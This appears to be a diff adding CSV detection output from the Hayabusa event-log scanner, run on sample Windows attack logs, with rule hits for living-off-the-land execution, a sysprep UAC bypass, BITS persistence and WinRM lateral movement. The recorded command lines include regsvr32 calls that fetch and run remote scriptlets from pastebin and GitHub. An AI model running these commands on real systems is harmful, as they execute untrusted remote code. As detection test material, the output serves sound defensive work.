+2019-05-12 22:38:00.712 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\mshta.exe"" ""C:\programdata\calc.hta""   :  Path: C:\Windows\System32\mshta.exe  :  User: IEWIN7\IEUser  :  Parent Command: rundll32.exe  url.dll,FileProtocolHandler file:///C:/programdata/calc.hta",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
+2019-05-12 22:38:00.712 +09:00,IEWIN7,1,high,MSHTA Suspicious Execution 01,,rules/sigma/process_creation/win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
+2019-05-12 22:38:00.712 +09:00,IEWIN7,1,high,Windows Shell Spawning Suspicious Program,,rules/sigma/process_creation/win_shell_spawn_susp_program.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
+2019-05-12 22:38:00.712 +09:00,IEWIN7,1,high,Suspicious MSHTA Process Patterns,,rules/sigma/process_creation/win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
+2019-05-12 22:38:01.383 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe""   :  Path: C:\Windows\System32\calc.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\System32\mshta.exe"" ""C:\programdata\calc.hta"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
+2019-05-12 22:55:56.626 +09:00,IEWIN7,1,informational,Process Creation,"Command: python  winpwnage.py -u execute -i 12 -p c:\Windows\System32\calc.exe  :  Path: C:\Python27\python.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx
+2019-05-12 22:56:12.652 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" shdocvw.dll,OpenURL c:\users\ieuser\appdata\local\temp\shdocvw.url  :  Path: C:\Windows\System32\rundll32.exe  :  User: IEWIN7\IEUser  :  Parent Command: python  winpwnage.py -u execute -i 12 -p c:\Windows\System32\calc.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx
+2019-05-12 22:56:12.652 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx
+2019-05-12 22:58:39.850 +09:00,IEWIN7,1,informational,Process Creation,"Command: python  winpwnage.py -u execute -i 14 -p c:\Windows\System32\calc.exe  :  Path: C:\Python27\python.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_zipfldr_RouteTheCall.evtx
+2019-05-12 22:58:54.897 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" zipfldr.dll,RouteTheCall c:\Windows\System32\calc.exe  :  Path: C:\Windows\System32\rundll32.exe  :  User: IEWIN7\IEUser  :  Parent Command: python  winpwnage.py -u execute -i 14 -p c:\Windows\System32\calc.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_zipfldr_RouteTheCall.evtx
+2019-05-12 22:58:54.897 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_zipfldr_RouteTheCall.evtx
+2019-05-12 23:18:03.589 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe""   :  Path: C:\Windows\System32\cmd.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_rundll32_advpack_RegisterOCX.evtx
+2019-05-12 23:18:09.589 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe""  advpack.dll,RegisterOCX c:\Windows\System32\calc.exe  :  Path: C:\Windows\System32\rundll32.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_rundll32_advpack_RegisterOCX.evtx
+2019-05-12 23:18:09.589 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_rundll32_advpack_RegisterOCX.evtx
+2019-05-13 02:01:43.391 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe""   :  Path: C:\Windows\System32\cmd.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_pcalua.evtx
+2019-05-13 02:01:50.781 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\pcalua.exe""  -a c:\Windows\system32\calc.exe  :  Path: C:\Windows\System32\pcalua.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_pcalua.evtx
+2019-05-13 02:01:51.007 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\calc.exe""   :  Path: C:\Windows\System32\calc.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\System32\pcalua.exe""  -a c:\Windows\system32\calc.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_pcalua.evtx
+2019-05-13 02:01:51.007 +09:00,IEWIN7,1,low,Indirect Command Execution,,rules/sigma/process_creation/win_indirect_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_pcalua.evtx
+2019-05-13 02:09:02.275 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe""  pcwutl.dll,LaunchApplication c:\Windows\system32\calc.exe  :  Path: C:\Windows\System32\rundll32.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_rundll32_pcwutl_LaunchApplication.evtx
+2019-05-13 02:09:02.275 +09:00,IEWIN7,1,medium,Code Execution via Pcwutl.dll,,rules/sigma/process_creation/win_susp_pcwutl.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_rundll32_pcwutl_LaunchApplication.evtx
+2019-05-13 02:09:02.275 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_rundll32_pcwutl_LaunchApplication.evtx
+2019-05-13 02:20:01.980 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe""   :  Path: C:\Windows\System32\cmd.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx
+2019-05-13 02:20:31.183 +09:00,IEWIN7,1,informational,Process Creation,"Command: python  winpwnage.py -u execute -i 11 -p c:\Windows\system32\calc.exe  :  Path: C:\Python27\python.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx
+2019-05-13 02:20:49.443 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /C c:\Windows\system32\calc.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\System32\ftp.exe"" -s:c:\users\ieuser\appdata\local\temp\ftp.txt",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx
+2019-05-13 02:20:49.443 +09:00,IEWIN7,1,medium,Suspicious ftp.exe,,rules/sigma/process_creation/win_susp_ftp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx
+2019-05-13 02:20:49.458 +09:00,IEWIN7,1,informational,Process Creation,Command: c:\Windows\system32\calc.exe  :  Path: C:\Windows\System32\calc.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\system32\cmd.exe /C c:\Windows\system32\calc.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx
+2019-05-13 03:04:50.121 +09:00,IEWIN7,59,informational,Bits Job Creation,Job Title: backdoor  :  URL: C:\Windows\system32\cmd.exe,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_bitsadmin_Microsoft-Windows-Bits-Client-Operational.evtx
+2019-05-13 03:35:05.155 +09:00,IEWIN7,1,informational,Process Creation,"Command: regsvr32.exe  /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll  :  Path: C:\Windows\System32\regsvr32.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx
+2019-05-13 03:35:05.155 +09:00,IEWIN7,1,high,Regsvr32 Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx
+2019-05-13 03:35:05.155 +09:00,IEWIN7,1,high,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx
+2019-05-13 03:35:05.780 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe""   :  Path: C:\Windows\System32\cmd.exe  :  User: IEWIN7\IEUser  :  Parent Command: regsvr32.exe  /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx
+2019-05-13 03:35:06.562 +09:00,IEWIN7,3,high,Regsvr32 Network Activity,,rules/sigma/network_connection/sysmon_regsvr32_network_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx
+2019-05-13 03:48:52.219 +09:00,IEWIN7,1,informational,Process Creation,"Command: jabber.exe  /u /s /i:http://pastebin.com/raw/H4A4iDTA .\jabber.dll  :  Path: C:\ProgramData\jabber.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_renamed_regsvr32_scrobj.evtx
+2019-05-13 03:48:52.766 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe""   :  Path: C:\Windows\System32\cmd.exe  :  User: IEWIN7\IEUser  :  Parent Command: jabber.exe  /u /s /i:http://pastebin.com/raw/H4A4iDTA .\jabber.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_renamed_regsvr32_scrobj.evtx
+2019-05-13 23:50:59.389 +09:00,IEWIN7,59,informational,Bits Job Creation,Job Title: hola  :  URL: C:\Windows\system32\cmd.exe,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_bitsadmin_Microsoft-Windows-Bits-Client-Operational.evtx
+2019-05-14 03:02:49.160 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\System32\mobsync.exe -Embedding  :  Path: C:\Windows\System32\mobsync.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx
+2019-05-14 03:03:19.681 +09:00,IEWIN7,1,informational,Process Creation,Command: /c notepad.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx
+2019-05-14 03:03:19.681 +09:00,IEWIN7,1,informational,Process Creation,Command: /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll  :  Path: C:\Windows\System32\regsvr32.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx
+2019-05-14 03:03:19.681 +09:00,IEWIN7,1,high,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx
+2019-05-14 03:03:19.681 +09:00,IEWIN7,1,high,Regsvr32 Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx
+2019-05-14 03:03:19.895 +09:00,IEWIN7,1,informational,Process Creation,Command: notepad.exe  :  Path: C:\Windows\System32\notepad.exe  :  User: IEWIN7\IEUser  :  Parent Command: /c notepad.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx
+2019-05-14 03:03:21.212 +09:00,IEWIN7,3,high,Regsvr32 Network Activity,,rules/sigma/network_connection/sysmon_regsvr32_network_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx
+2019-05-14 03:05:18.692 +09:00,IEWIN7,1,informational,Process Creation,Command: wmiadap.exe /F /T /R  :  Path: C:\Windows\System32\wbem\WMIADAP.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx
+2019-05-14 10:29:04.306 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\System32\mshta.exe -Embedding  :  Path: C:\Windows\System32\mshta.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx
+2019-05-14 10:29:04.306 +09:00,IEWIN7,1,high,MSHTA Suspicious Execution 01,,rules/sigma/process_creation/win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx
+2019-05-14 10:29:04.306 +09:00,IEWIN7,1,high,Suspicious MSHTA Process Patterns,,rules/sigma/process_creation/win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx
+2019-05-14 10:29:04.306 +09:00,IEWIN7,1,high,MSHTA Spwaned by SVCHOST,,rules/sigma/process_creation/win_lethalhta.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx
+2019-05-14 11:32:48.290 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\whoami.exe""  /groups  :  Path: C:\Windows\System32\whoami.exe  :  User: IEWIN7\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
+2019-05-14 11:32:48.290 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
+2019-05-14 11:32:48.290 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
+2019-05-14 11:32:48.290 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
+2019-05-14 11:32:48.359 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\whoami.exe""  /groups  :  Path: C:\Windows\System32\whoami.exe  :  User: IEWIN7\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
+2019-05-14 11:32:48.359 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
+2019-05-14 11:32:48.359 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
+2019-05-14 11:32:48.359 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
+2019-05-14 11:32:51.143 +09:00,IEWIN7,1,informational,Process Creation,Command: consent.exe 968 288 03573528  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
+2019-05-14 11:32:51.453 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\sysprep\sysprep.exe""  :  Path: C:\Windows\System32\sysprep\sysprep.exe  :  User: IEWIN7\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
+2019-05-14 11:32:51.453 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
+2019-05-14 11:32:51.470 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\sysprep\sysprep.exe"" ""C:\Windows\System32\sysprep\sysprep.exe""   :  Path: C:\Windows\System32\sysprep\sysprep.exe  :  User: IEWIN7\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
+2019-05-14 11:32:51.470 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
+2019-05-14 11:32:51.487 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\sysprep\sysprep.exe""   :  Path: C:\Windows\System32\sysprep\sysprep.exe  :  User: IEWIN7\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
+2019-05-14 11:32:51.487 +09:00,IEWIN7,1,informational,Process Creation,Command: consent.exe 968 312 0197CDB0  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
+2019-05-14 11:32:51.487 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
+2019-05-14 11:32:51.814 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\sysprep\sysprep.exe""   :  Path: C:\Windows\System32\sysprep\sysprep.exe  :  User: IEWIN7\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
+2019-05-14 11:32:51.831 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe""  :  Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\System32\sysprep\sysprep.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
+2019-05-14 11:32:51.831 +09:00,IEWIN7,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
+2019-05-14 23:04:05.697 +09:00,alice.insecurebank.local,11,high,Hijack Legit RDP Session to Move Laterally,,rules/sigma/file_event/sysmon_tsclient_filewrite_startup.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_tsclient_startup_folder.evtx
+2019-05-15 02:17:26.440 +09:00,alice.insecurebank.local,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx
+2019-05-15 02:17:26.738 +09:00,alice.insecurebank.local,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx
+2019-05-15 13:18:40.474 +09:00,IEWIN7,13,high,Office Security Settings Changed,,rules/sigma/registry_event/sysmon_reg_office_security.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_sysmon_13_VBA_Security_AccessVBOM.evtx
+2019-05-16 10:31:36.426 +09:00,DC1.insecurebank.local,1,informational,Process Creation,Command: C:\Windows\system32\WinrsHost.exe -Embedding  :  Path: C:\Windows\System32\winrshost.exe  :  User: insecurebank\Administrator  :  Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_winrm_exec_sysmon_1_winrshost.evtx
+2019-05-16 10:31:36.454 +09:00,DC1.insecurebank.local,1,informational,Process Creation,Command: C:\Windows\system32\cmd.exe /C ipconfig  :  Path: C:\Windows\System32\cmd.exe  :  User: insecurebank\Administrator  :  Parent Command: C:\Windows\system32\WinrsHost.exe -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_winrm_exec_sysmon_1_winrshost.evtx
+2019-05-16 10:31:36.456 +09:00,DC1.insecurebank.local,1,informational,Process Creation,Command: ipconfig  :  Path: C:\Windows\System32\ipconfig.exe  :  User: insecurebank\Administrator  :  Parent Command: C:\Windows\system32\cmd.exe /C ipconfig,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_winrm_exec_sysmon_1_winrshost.evtx
+2019-05-16 10:38:19.630 +09:00,DC1.insecurebank.local,1,high,Process Creation Sysmon Rule Alert,"Rule: Lateral Movement - Windows Remote Management  :  Command: ""C:\Windows\system32\HOSTNAME.EXE""  :  Path: C:\Windows\System32\HOSTNAME.EXE  :  User: insecurebank\Administrator  :  Parent Command: C:\Windows\system32\wsmprovhost.exe -Embedding",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_PowershellRemoting_sysmon_1_wsmprovhost.evtx
+2019-05-16 10:38:19.630 +09:00,DC1.insecurebank.local,1,medium,Remote PowerShell Session Host Process (WinRM),,rules/sigma/process_creation/win_remote_powershell_session_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_PowershellRemoting_sysmon_1_wsmprovhost.evtx
